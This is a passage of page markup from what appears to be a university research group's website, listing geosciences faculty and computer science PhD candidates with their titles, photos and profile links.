class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-973 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1636 style-973-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-974 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-975 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-976 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-977 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c61\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c61 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c128\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c128 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c129-outer\">\n            <div data-colibri-id=\"182-c129\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c129 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-862 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c62\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c62 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c63-outer\">\n            <div data-colibri-id=\"182-c63\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c63 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c64\" class=\"d-block style-854 style-local-182-c64 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c64-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c64-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c65\" class=\"h-global-transition-all h-heading style-850 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c65\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-text h-text-component style-851 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-902 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"style-855 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-849 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-901 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-853 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon 